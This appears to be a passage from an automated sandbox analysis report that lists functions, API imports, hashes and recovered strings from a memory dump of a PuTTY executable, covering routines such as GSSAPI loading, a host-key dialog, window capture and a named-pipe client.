Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9550bb8efecbf2126ecdc11016c71341ffc6a6b2fd4f8309d86a6f5e1d73da
Instruction ID: d0a6371c4ad55319252af2cea17fc7210e91bbc4fa08ad0c1fb205c535859a00
Opcode Fuzzy Hash: cd9550bb8efecbf2126ecdc11016c71341ffc6a6b2fd4f8309d86a6f5e1d73da
Instruction Fuzzy Hash: 5FF09072650228ABC756EE5C8A09B79FAB8EB06B10F114052E711DB291C2B1DF0487D1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF63E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ca45b9e900cdb3cbc568ff702446c413785d6751f42584dec04411c4503730
Instruction ID: 2cc50d6517ebf63280fff79d078a8585dd56d20a94b90ffe13206205f7348a1a
Opcode Fuzzy Hash: 52ca45b9e900cdb3cbc568ff702446c413785d6751f42584dec04411c4503730
Instruction Fuzzy Hash: D7F03931A11368EBCB26EB4CC905A99B7FCEB89B50F1240A6E601E7251D7B4DE00E7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF63AF Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f38027eb8f64627028ef42fd31d7d4015889d5840a38e1eec7982d23a94132
Instruction ID: 8b20d3586bc80ec9e6119f4f183b03044e372c54b44b7df777223eec47b9903a
Opcode Fuzzy Hash: 66f38027eb8f64627028ef42fd31d7d4015889d5840a38e1eec7982d23a94132
Instruction Fuzzy Hash: FFE08C7291127CEBCB14DB88C904A9AF3ECEB45B10B11059AB601D3220C2B0DF04D7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00C8CA90 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279f7eb8e6c167c4409cab0f2abcd02a44e999263011f89c71bc761125bf0a14
Instruction ID: cd8da3997b65aaa1306593c5df4e8c1855441ac59c8ee45c51ac49fdfecee23c
Opcode Fuzzy Hash: 279f7eb8e6c167c4409cab0f2abcd02a44e999263011f89c71bc761125bf0a14
Instruction Fuzzy Hash: E8C0123090272056DA309E05B8447D7BAB85F53358F001414FC4663241D370D58886ED

Uniqueness

Uniqueness Score: -1.00%

Function 00CEABA2 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab7f13b2fa88397a75655b1bd4fe4b0ba8d9f6ce3449be10a51de5468010258
Instruction ID: 741efb5028083b059d9dc710b79cd07e37e703b0b98f42e10773bdeb1b85164f
Opcode Fuzzy Hash: 7ab7f13b2fa88397a75655b1bd4fe4b0ba8d9f6ce3449be10a51de5468010258
Instruction Fuzzy Hash: C8C08C380009809FCE29891092B2BB4335AA7917C2F80088CC9120B642C95EAD86E642

Uniqueness

Uniqueness Score: -1.00%

Function 00C90660 Relevance: 126.4, APIs: 42, Strings: 30, Instructions: 400libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 00C906AB
RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\MIT\Kerberos,?), ref: 00C906DD
RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00C90706
RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?), ref: 00C90743
_strlen.LIBCMT ref: 00C9075F
_strlen.LIBCMT ref: 00C9079C
LoadLibraryExA.KERNEL32(00000000,00000000,00000D00), ref: 00C907CA
RegCloseKey.ADVAPI32(?), ref: 00C90836
GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00C90878
GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00C90884
GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00C90890
GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00C9089C
GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00C908A8
GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00C908B4
GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00C908C0
GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00C908CC
GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00C908D8
GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00C908E4
GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00C908F0
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00C67590,?), ref: 00C9090B
FreeLibrary.KERNEL32(00000000), ref: 00C907FE

Part of subcall function 00C7BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

GetProcAddress.KERNEL32(00000000,AcquireCredentialsHandleA), ref: 00C9095A
GetProcAddress.KERNEL32(00000000,InitializeSecurityContextA), ref: 00C90967
GetProcAddress.KERNEL32(00000000,FreeContextBuffer), ref: 00C90974
GetProcAddress.KERNEL32(00000000,FreeCredentialsHandle), ref: 00C90981
GetProcAddress.KERNEL32(00000000,DeleteSecurityContext), ref: 00C9098E
GetProcAddress.KERNEL32(00000000,QueryContextAttributesA), ref: 00C9099B
GetProcAddress.KERNEL32(00000000,MakeSignature), ref: 00C909A8
GetProcAddress.KERNEL32(00000000,VerifySignature), ref: 00C909B5
_strlen.LIBCMT ref: 00C90A3C
LoadLibraryExA.KERNEL32(?,00000000,00000D00,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C90AB7
GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00C90B05
GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00C90B11
GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00C90B1D
GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00C90B29
GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00C90B35
GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00C90B41
GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00C90B4D
GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00C90B59
GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00C90B65
GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00C90B71
GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00C90B7D

Strings

gss_acquire_cred, xrefs: 00C908DE, 00C90B6B
Using GSSAPI from user-specified library '%s', xrefs: 00C90AE4
gss_delete_sec_context, xrefs: 00C90872, 00C90AFF
secur32.dll, xrefs: 00C90915
InstallDir, xrefs: 00C906FD, 00C9073A
gss_verify_mic, xrefs: 00C90896, 00C90B23
gss_release_buffer, xrefs: 00C908BA, 00C90B47
WVj, xrefs: 00C909E4
gss_import_name, xrefs: 00C908A2, 00C90B2F
gss_display_status, xrefs: 00C9087E, 00C90B0B
gss_init_sec_context, xrefs: 00C908AE, 00C90B3B
l, xrefs: 00C907BB
gss_get_mic, xrefs: 00C9088A, 00C90B17
gss_release_cred, xrefs: 00C908C6, 00C90B53
gss_release_name, xrefs: 00C908D2, 00C90B5F
VerifySignature, xrefs: 00C909AF
AddDllDirectory, xrefs: 00C906A5
api3, xrefs: 00C907AB
InitializeSecurityContextA, xrefs: 00C90961
AcquireCredentialsHandleA, xrefs: 00C90954
DeleteSecurityContext, xrefs: 00C90988
MakeSignature, xrefs: 00C909A2
SOFTWARE\MIT\Kerberos, xrefs: 00C906D3
FreeContextBuffer, xrefs: 00C9096E
%.*s, xrefs: 00C90A78
QueryContextAttributesA, xrefs: 00C90995
kernel32.dll, xrefs: 00C9068B
FreeCredentialsHandle, xrefs: 00C9097B
2.dl, xrefs: 00C907B3
gss_inquire_cred_by_mech, xrefs: 00C908EA, 00C90B77

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc$Library$Load_strlen$CloseQueryValue$FreeOpen
String ID: %.*s$2.dl$AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from user-specified library '%s'$VerifySignature$WVj$api3$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$kernel32.dll$l$secur32.dll
API String ID: 3724305165-1250506787
Opcode ID: 61c206e5bc10a5523b50b0624c7c0f80fea9f01191cfab14c0f16d513172ae8b
Instruction ID: 8c9c972827125b038229fe801d83aea47889e58515cb57192a3599f1683e3e12
Opcode Fuzzy Hash: 61c206e5bc10a5523b50b0624c7c0f80fea9f01191cfab14c0f16d513172ae8b
Instruction Fuzzy Hash: 16D1DBB0940304BFDB10DF659C8AB3A7BE4EF55B08F10402DFD49D6296EB74DA049B66

Uniqueness

Uniqueness Score: -1.00%

Function 00C5E6D0 Relevance: 75.7, APIs: 40, Strings: 3, Instructions: 415windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F4), ref: 00C5E7D1
SetBkMode.GDI32(?,00000001), ref: 00C5E7ED
GetStockObject.GDI32(0000000D), ref: 00C5E7F5
SelectObject.GDI32(?,00000000), ref: 00C5E7FD
GetObjectA.GDI32(00000000,0000003C,?), ref: 00C5E80B
CreateFontIndirectA.GDI32(?), ref: 00C5E832
SelectObject.GDI32(?,00000000), ref: 00C5E83E
GetSysColorBrush.USER32(0000000F), ref: 00C5E846
SetDlgItemTextA.USER32(?,00000064,00000000), ref: 00C5E907
SetWindowTextA.USER32(?), ref: 00C5E925
GetDlgItem.USER32(?,00000063), ref: 00C5E938
DestroyWindow.USER32(00000000), ref: 00C5E943
SendDlgItemMessageA.USER32(?,00000064,000000BA,00000000,00000000), ref: 00C5E955
MapDialogRect.USER32(?,00000028), ref: 00C5E998
GetDlgItem.USER32(?,00000064), ref: 00C5E9BE
GetDlgItem.USER32(?,00000002), ref: 00C5E9E7

Strings

%s, xrefs: 00C5E77C
<, xrefs: 00C5EADE
PuTTYHostKeyMoreInfo, xrefs: 00C5E882

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Item$Object$Window$SelectText$BrushColorCreateDestroyDialogFontIndirectLongMessageModeRectSendStock
String ID: %s$<$PuTTYHostKeyMoreInfo
API String ID: 2631976558-3476551089
Opcode ID: 20b9c9f733071faded438d9a0cda065b818a19259356aecfbda38aaaf33864e8
Instruction ID: f3b4ef7851144ab624ac5b0bcc571420e5c65fc2b2682d738830598fbc99a75f
Opcode Fuzzy Hash: 20b9c9f733071faded438d9a0cda065b818a19259356aecfbda38aaaf33864e8
Instruction Fuzzy Hash: 7CE1AA75148301AFE7209F14EC49B2ABBE5FB84744F00480DFA94A62E1C775EA48DFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C080 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 267windowlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,DwmGetWindowAttribute), ref: 00C7C0B7
GetDC.USER32(00000000), ref: 00C7C0C8
GetCurrentObject.GDI32(00000000,00000007), ref: 00C7C147
GetObjectA.GDI32(00000000,00000018,00000000), ref: 00C7C155
CreateCompatibleDC.GDI32(00000000), ref: 00C7C173
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00C7C186
SelectObject.GDI32(00000000,00000000), ref: 00C7C1A0
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CC0020), ref: 00C7C1C7
GetDIBits.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7C251
GetLastError.KERNEL32 ref: 00C7C25F

Part of subcall function 00C7BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

GetLastError.KERNEL32 ref: 00C7C2F9

Part of subcall function 00C7CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
Part of subcall function 00C7CEE0: _strlen.LIBCMT ref: 00C7CF76

ReleaseDC.USER32(00000000,?), ref: 00C7C3DE
DeleteObject.GDI32(?), ref: 00C7C3E8
DeleteObject.GDI32(00000000), ref: 00C7C3EF

Strings

SelectObject: %s, xrefs: 00C7C38C
6, xrefs: 00C7C2AD
DwmGetWindowAttribute, xrefs: 00C7C0B1
(, xrefs: 00C7C208
GetDIBits (get data): %s, xrefs: 00C7C26F
BM, xrefs: 00C7C29B
'%s': unable to open file, xrefs: 00C7C3C9
CreateCompatibleDC(desktop window dc): %s, xrefs: 00C7C32F
dwmapi.dll, xrefs: 00C7C09B
BitBlt: %s, xrefs: 00C7C3B5
GetDC(window): %s, xrefs: 00C7C30B
CreateCompatibleBitmap: %s, xrefs: 00C7C35E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect_strlen
String ID: '%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
API String ID: 422774641-2800384791
Opcode ID: 9efa192a4776fa9a8ba7c0ff74db4b9000191d9ff6c9f60882fa935ccada196a
Instruction ID: 6f8ff926a3d560dfd46b004a5bba400488e13cc62a646c61669b9b142ba2eae5
Opcode Fuzzy Hash: 9efa192a4776fa9a8ba7c0ff74db4b9000191d9ff6c9f60882fa935ccada196a
Instruction Fuzzy Hash: 3991C3B1544301AFE310AF61AC4AB5F7AE8EB94744F00842CF65DD7292E7B599089B73

Uniqueness

Uniqueness Score: -1.00%

Function 00C41B7F Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 173windowCOMMON

Download Yara Rule

APIs

HideCaret.USER32 ref: 00C41B80
BeginPaint.USER32(?,?), ref: 00C41B8F
SelectPalette.GDI32(00000000,?,00000001), ref: 00C41BA4
RealizePalette.GDI32(00000000), ref: 00C41BAB
CreateSolidBrush.GDI32 ref: 00C41CCF
SelectObject.GDI32(?,00000000), ref: 00C41CE5
CreatePen.GDI32(00000000,00000000), ref: 00C41CF3
SelectObject.GDI32(?,00000000), ref: 00C41CFD
IntersectClipRect.GDI32(?,?,?,?,?), ref: 00C41D20
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00C41D5A
Rectangle.GDI32(?,?,?,?,?), ref: 00C41D7D
SelectObject.GDI32(?,00000000), ref: 00C41D8B
DeleteObject.GDI32(?), ref: 00C41D97
SelectObject.GDI32(?,?), ref: 00C41D9E
DeleteObject.GDI32(00000000), ref: 00C41DA1
GetStockObject.GDI32(0000000D), ref: 00C41DAB
SelectObject.GDI32(?,00000000), ref: 00C41DB9
GetStockObject.GDI32(00000006), ref: 00C41DBD
SelectObject.GDI32(?,00000000), ref: 00C41DC1
EndPaint.USER32(?,?), ref: 00C41DD3
ShowCaret.USER32(?), ref: 00C41DDA

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C41BBF
!wintw_hdc, xrefs: 00C41BC4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c
API String ID: 4109966220-2511222366
Opcode ID: f26c19a38cd729a44531f3c233fbef741867610358f0c2b9c230d1455b861601
Instruction ID: 5a1efa0addd2018ee307e5a6f5e3203ef8bd1f3f2d5bd221e6373fc091fdc3b3
Opcode Fuzzy Hash: f26c19a38cd729a44531f3c233fbef741867610358f0c2b9c230d1455b861601
Instruction Fuzzy Hash: 97614B7A105300EFD7109F64ED85BAABBEAFB89311F044429F649C7361D7315891DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF3E0 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 138filepipeCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00CCF424
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,40000000,00000000,?,?,?,?,?,00CCF5A8,?), ref: 00CCF465
GetLastError.KERNEL32(?,?,?,?,?,00CCF5A8,?), ref: 00CCF46C
WaitNamedPipeA.KERNEL32(?,00000000), ref: 00CCF47A
GetLastError.KERNEL32(?,?,?,?,?,00CCF5A8,?), ref: 00CCF484

Part of subcall function 00C7C580: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C5B7
Part of subcall function 00C7C580: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C5C5
Part of subcall function 00C7C580: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C604
Part of subcall function 00C7C580: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C621
Part of subcall function 00C7C580: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C64B
Part of subcall function 00C7C580: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00C7C66A
Part of subcall function 00C7C580: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C68B
Part of subcall function 00C7C580: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C69A
Part of subcall function 00C7C580: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C6A5

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00CCF5A8,?), ref: 00CCF4C7
GetLastError.KERNEL32(?,?,?,?,?,?,00CCF5A8,?), ref: 00CCF4CD

Part of subcall function 00C7CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
Part of subcall function 00C7CEE0: _strlen.LIBCMT ref: 00C7CF76

CloseHandle.KERNEL32(00000000,?,?,?,?,?,00CCF5A8,?), ref: 00CCF505
GetLastError.KERNEL32(?,?,?,?,?,00CCF5A8,?), ref: 00CCF50B
EqualSid.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00CCF5A8,?), ref: 00CCF527
LocalFree.KERNEL32(?,?,?,?,?,?,?,00CCF5A8,?), ref: 00CCF534

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/named-pipe-client.c, xrefs: 00CCF40C, 00CCF432
Error waiting for named pipe '%s': %s, xrefs: 00CCF495
Owner of named pipe '%s' is not us, xrefs: 00CCF54D
Unable to get user SID: %s, xrefs: 00CCF51B
\\.\pipe\, xrefs: 00CCF3F8
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00CCF411
strchr(pipename + 9, '\\') == NULL, xrefs: 00CCF437
Unable to get named pipe security information: %s, xrefs: 00CCF4DD
Unable to open named pipe '%s': %s, xrefs: 00CCF4F5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$CloseHandle$Local$FreeProcess$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait___from_strstr_to_strchr_strlen
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
API String ID: 1975913820-2491762229
Opcode ID: 482212d6a86da3c1ac7addb5950c478f0e5d45c05c2ea9f5a2ab25461df85657
Instruction ID: cceaafd0f68677c8a325c9c90e9dbd6aae3bb7bb12b8bd4a62d4ec9a1d04d485
Opcode Fuzzy Hash: 482212d6a86da3c1ac7addb5950c478f0e5d45c05c2ea9f5a2ab25461df85657
Instruction Fuzzy Hash: C34128B5A40300BBE3107B71FC0BF2B3A5EAF54755F05403CFA1AE62D2E6619A159E72

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA7B0 Relevance: 38.8, APIs: 2, Strings: 20, Instructions: 265COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00CCA8CC
_strftime.LIBCMT ref: 00CCA93E

Strings

cert_valid_after_date, xrefs: 00CCA8EA
cert_valid_before_date, xrefs: 00CCA95C
cert_extension_data, xrefs: 00CCA98F
cert_critical_option_data, xrefs: 00CCA978
cert_key_id, xrefs: 00CCA848
host, xrefs: 00CCA816
cert_critical_option, xrefs: 00CCA97D
cert_serial, xrefs: 00CCA7FB
cert_ca_sig, xrefs: 00CCAAAD
cert_ca_key_algorithm_id, xrefs: 00CCA9F7, 00CCAA93
cert_nonce, xrefs: 00CCA7E7
cert_type, xrefs: 00CCA822, 00CCA835
cert_valid_principal, xrefs: 00CCA85D
cert_extension, xrefs: 00CCA994
cert_ca_key_, xrefs: 00CCAA3A
cert_valid_before, xrefs: 00CCA884
%Y-%m-%d %H:%M:%S UTC, xrefs: 00CCA8C1, 00CCA933
cert_valid_after, xrefs: 00CCA870
cert_ca_key, xrefs: 00CCA9AA
user, xrefs: 00CCA81D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strftime
String ID: %Y-%m-%d %H:%M:%S UTC$cert_ca_key$cert_ca_key_$cert_ca_key_algorithm_id$cert_ca_sig$cert_critical_option$cert_critical_option_data$cert_extension$cert_extension_data$cert_key_id$cert_nonce$cert_serial$cert_type$cert_valid_after$cert_valid_after_date$cert_valid_before$cert_valid_before_date$cert_valid_principal$host$user
API String ID: 1867682108-3603795471
